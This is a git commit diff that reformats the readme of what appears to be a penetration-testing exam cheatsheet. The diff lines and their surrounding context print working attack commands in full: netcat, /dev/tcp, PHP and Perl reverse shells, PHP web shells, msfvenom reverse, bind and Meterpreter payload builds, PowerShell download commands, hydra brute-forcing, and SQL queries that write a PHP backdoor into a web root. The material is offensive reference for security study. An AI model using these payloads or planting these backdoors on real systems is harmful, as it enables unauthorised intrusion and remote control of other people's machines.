formatting

CountablyInfinite · Sep 21, 2020 · 16316b6 · 16316b6
1 parent c4ab1b4
commit 16316b6
Showing 1 changed file with 37 additions and 33 deletions.
diff --git a/readme.md b/readme.md
@@ -9,6 +9,8 @@ Once finished, all of the commands will also be available in a - even more struc
 This cheatsheet is definitely not "complete". I am sure i forgot to write down hundreds of essential commands, used most of them in the wrong way with unnessecary flags and you'll  probably soon ask yourself how i've even made it through the exam. Also you might think a certain tool used should be in another phase of the attack (e.g certain nmap vulnerabitly scripts should be in Exploitation). That's okay, imho the edges between different stages of a penetration test are very blurry. Feel free to issue a PR if you want to help to improve the list.
 **Use for educational purposes only!**
 
+***
+
 # Table Of Content
 
 - [Reconnaissance](#reconnaissance)
@@ -84,7 +86,7 @@ This cheatsheet is definitely not "complete". I am sure i forgot to write down h
   * [VBScript](#vbscript)
     + [Create wget.vbs File](#create-wgetvbs-file)
     + [Download Files](#download-files)
-- [shells](#shells)
+- [Shells](#shells)
   * [Upgrade Your Shell (Interactive Shell)](#upgrade-your-shell--interactive-shell-)
   * [Enable Tab-Completion](#enable-tab-completion)
   * [Catching Reverse Shells (Nc)](#catching-reverse-shells--nc-)
@@ -124,6 +126,7 @@ This cheatsheet is definitely not "complete". I am sure i forgot to write down h
     + [Reverse Shell](#reverse-shell-1)
   * [PhpmyAdmin](#phpmyadmin)
 
+***
 
 # Reconnaissance
 
@@ -151,7 +154,7 @@ nmap -v -sS -Pn -sV -p 0-65535 -oA full_scan_192.168.0.1 192.168.0.1
 ```
 
 ### Limited Full TCP Scan
-**If the syn scan is taking very long to complete, the following command is an alternative (no service detection).**
+*If the syn scan is taking very long to complete, the following command is an alternative (no service detection).*
 
 ```bash
 nmap -sT -p- --min-rate 5000 --max-retries 1 192.168.0.1
@@ -204,7 +207,7 @@ gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirbuster/director
 
 ### HTTPS
 
-**Set the `--insecuressl` flag.**
+*Set the `--insecuressl` flag.*
 
 ***
 
@@ -341,7 +344,7 @@ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-post-form "/
 ```
 
 ### MYSQL
-**Change MYDATABASENAME. Default databasename is mysql.**
+*Change MYDATABASENAME. Default databasename is mysql.*
 
 ```bash
 hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -vv  mysql://192.168.0.1:3306/MYDATABASENAME -t 15
@@ -360,7 +363,7 @@ powershell -ExecutionPolicy bypass -noprofile -c (New-Object System.Net.WebClien
 ```
 
 ### Encode Command for Transfer
-**Very helpful for chars that need to be escaped otherwise.**
+*Very helpful for chars that need to be escaped otherwise.*
 
 ```bash
 $Command = '(new-object System.Net.WebClient).DownloadFile("http://192.168.0.1:80/ftp.txt","C:\Windows\temp\ftp.txt")' 
@@ -533,7 +536,7 @@ cscript wget.vbs http://192.168.0.1/nc.exe nc.exe
 
 ***
 
-# shells
+# Shells
 
 ***
 
@@ -545,15 +548,16 @@ python -c 'import pty;pty.spawn("/bin/bash");'
 ***
 
 ## Enable Tab-Completion
-**1. In your active shell press `bg` to send your nc session to background**
-**2. Enter `stty raw -echo`**
-**3. Enter `fg` to bring your nc session to foreground**
-**4. Enter `export TERM=xterm-256color`**
+1. In your active shell press `bg` to send your nc session to background
+2. Enter `stty raw -echo`
+3. Enter `fg` to bring your nc session to foreground
+4. Enter `export TERM=xterm-256color`
 
 ***
 
 ## Catching Reverse Shells (Nc)
-**rlwrap enables the usage arrow keys on your shell.**
+*rlwrap enables the usage of arrow keys in your shell.*
+https://github.com/hanslub42/rlwrap
 ```bash
 rlwrap nc -nlvp 4444
 ```
@@ -568,7 +572,7 @@ rlwrap nc -nlvp 4444
 ```bash
 nc 192.168.0.1 4444 -e /bin/bash
 ```
-**If `-e` is not allowed, try to find other versions of netcat**
+*If `-e` is not allowed, try to find other versions of netcat*
 
 ```bash
 /bin/nc
@@ -585,22 +589,22 @@ nc 192.168.0.1 4444 -e cmd.exe
 
 #### Unix
 
-**Victim:**
+*Victim:*
 ```bash
 nc -nlvp 4444 -e /bin/bash
 ```
-**Attacker:**
+*Attacker:*
 ```bash
 nc 192.168.0.1 4444
 ```
 
 #### Windows
 
-**Victim:**
+*Victim:*
 ```bash
 nc -nlvp 4444 -e cmd.exe
 ```
-**Attacker:**
+*Attacker:*
 ```bash
 nc 192.168.0.1 4444
 ```
@@ -647,17 +651,17 @@ cat /usr/share/webshells/php/php-backdoor.php
 ```
 
 ### PHP Reverse Shell
-**Version 1:**
+*Version 1:*
 ```bash
 <?php echo shell_exec("/bin/bash -i >& /dev/tcp/192.168.0.1/4444 0>&1");?>
 ```
 
-**Version 2:**
+*Version 2:*
 ```bash
 <?php $sock=fsockopen("192.168.0.1", 4444);exec("/bin/sh -i <&3 >&3 2 >& 3");?>
 ```
 
-**As Command:**
+*As Command:*
 ```bash
 php -r '$sock=fsockopen("192.168.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
 ```
@@ -666,7 +670,7 @@ php -r '$sock=fsockopen("192.168.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
 ```bash
 <?php echo system($_REQUEST["cmd"]); ?>
 ```
-**Call the CMD shell:**
+*Call the CMD shell:*
 ```bash
 http://192.168.0.1/cmd_shell.php?cmd=whoami
 ```
@@ -681,56 +685,56 @@ https://github.com/WhiteWinterWolf/wwwolf-php-webshell
 
 ### Windows Binary (.exe)
 #### 32 Bit (x86)
-**Reverse Shell:**
+*Reverse Shell:*
 ```bash
 msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe
 ```
 
-**Bind Shell:**
+*Bind Shell:*
 ```bash
 msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exe
 ```
 
-**Output in Hex, C Style, Exclude bad chars, Exitfunction thread:**
+*Output in Hex, C Style, Exclude bad chars, Exitfunction thread:*
 ```bash
 msfvenom -p windows/shell_bind_tcp LHOST=192.168.0.1 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
 ```
 
 #### 64 Bit (x64)
-**Reverse Shell:**
+*Reverse Shell:*
 ```bash
 msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe
 ```
 
-**Bind Shell:**
+*Bind Shell:*
 ```bash
 msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exe
 ```
 
-**Meterpreter:**
+*Meterpreter:*
 ```bash
 msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe
 ```
 
 ### Linux Binary (.elf)
 #### 32 Bit (x86)
-**Reverse Shell:**
+*Reverse Shell:*
 ```bash
 msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf > rev_shell.elf
 ```
 
-**Bind Shell:**
+*Bind Shell:*
 ```bash
 msfvenom -p linux/x86/shell/bind_tcp  LHOST=192.168.0.1 -f elf > bind_shell.elf
 ```
 
 #### 64 Bit (x64)
-**Reverse Shell:**
+*Reverse Shell:*
 ```bash
 msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf > rev_shell.elf
 ```
 
-**Bind Shell:**
+*Bind Shell:*
 ```bash
 msfvenom -p linux/x64/shell/bind_tcp LHOST=192.168.0.1 -f elf > rev_shell.elf
 ```
@@ -740,7 +744,7 @@ msfvenom -p linux/x64/shell/bind_tcp LHOST=192.168.0.1 -f elf > rev_shell.elf
 msfvenom -p java/jsp_shell_reverse_tcp LHOST192.168.0.1 LPORT=4444 -f raw > shell.jsp
 ```
 
-As .war:
+*As .war:*
 ```bash
 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f war -o shell.war
 ```
@@ -810,12 +814,12 @@ perl -MIO -e 'use Socket;$ip="172.16.1.1";$port=53;socket(S,PF_INET,SOCK_STREAM,
 Write a CMD shell into a file with the right permissions. Issue the following select.
 (Try different paths for different webservers)
 
-**Windows:**
+*Windows:*
 ```sql
 SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
 ```
 
-**Unix:**
+*Unix:*
 ```sql
 SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"
 ```